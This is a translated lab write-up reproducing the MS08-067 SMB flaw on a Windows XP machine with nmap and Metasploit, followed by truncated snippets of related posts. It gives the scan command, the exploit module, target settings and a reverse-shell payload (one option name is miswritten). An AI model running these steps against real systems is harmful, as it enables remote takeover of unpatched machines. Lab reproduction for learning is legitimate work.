tags: Safety
Realize environment preparation:
Attack machine: kali (IP: 192.168.153.129)
Target drone: Windows XP (IP: 192.168.153.128)
Attack tools: metasploit-framework, nmap
The first step: use nmap to scan the target drone to determine whether it has ms08-067 vulnerabilities
nmap -n -p 445 --script smb-vuln-ms08-067 192.168.153.128 --open
The scan found that the target drone has the vulnerability, and it has the experimental conditions
Step 2: Open metasploit-framework, search for ms08-067 vulnerability, call the exploit

use exploit/windows/smb/ms08_067_netapi
show options view the option parameters that the exploit needs to configure

Step 3: Configure the ip address of the target machine according to the prompt information
set rhost 192.168.153.128

Step 4: View the attack payload for this vulnerability in metasploit-framework, and select one of them for this experiment

Here I choose the one that can reverse shell

Call the payload and view the configuration parameters
set payload windows/shell_reverse_tcp

Since the payload is a payload for establishing a rebound connection, that is, as soon as the payload is executed, the target machine will bounce its shell to the attacker, which is the kali in the experimental environment, so we will The IP of the attacker is added to the payload
set localhost 192.168.153.129

Step 5: All preparations are completed, now only needs to execute the exploit, the drone will bounce its shell to the attacker kali

Now we have successfully obtained the shell of the target machine, ipconfig checks that the current ip is 192.168.153.128, indicating that we have successfully logged in to the target machine and achieved the expected results of the experiment. The recurrence of this vulnerability is complete.
#windowsxpsp3 system MS08-067 vulnerability test Vulnerability description The full name of the MS08-067 vulnerability is "Windows Server Service RPC Request Buffer Overflow Vulnerability". ...
lab environment kali linux2.0 win-xp sp3 Steps 1. Execute in the Kali Linux command line 2. Query MS08067 Vulnerability 3. Using Exploit / Windows / SMB / MS08_067_Netapi and view Options 4. Using Pay...
ms08-067 introduction The MS08-067 vulnerability will affect all Windows systems except Windows Server 2008 Core, including: Windows 2000/XP/Server 2003/Vista/Server 2008 versions, and even Windows 7 ...
MS08-067 Remote Overflow Vulnerability Brief description of the vulnerability principle The attacker uses the default open SMB service port 445 of the victim host to send a special RPC (Remote ...
1. Find ms08-067: 2. Use: 3. Select the payload: (At the beginning, there is a difference between windows / shell / ... and windows / meterpreter / reverse_tpc) 4. View options (yes is required): 5. E...
0x01 experimental environment Attack machine: kali linux ip:10.10.10.131 Target machine: windows server 2003 ip:10.10.10.130 0x02 configure exploit msf > use exploit/windows/smb/ms08_067_netapi&nbs...
Put the previous experiments and written in the note in the cloud, put it on the CSDN First, an experimental environment Target: Windows XP SP3 Professional (Close Windows self-contained firewall!!!) ...
MS08-067 Vulnerability: It is a vulnerability in a remote process call (RPC) service. When calling the NetPathCanonicalize function in the SMB channel, the vulnerability is triggered, causing the use ...
Articles directory Foreword Introduction Second, influence Third, vulnerability harm Fourth, local reproduction Five, patch number 6. Windows Server 2003 SP2 Chinese version Utilization method 7. Deep...
nmap scanning system for vulnerabilities, scanning system information nmap --script = vuln 192.168.64.137 Check for common vulnerabilities nmap -O detection system version Start msfconsole, search for...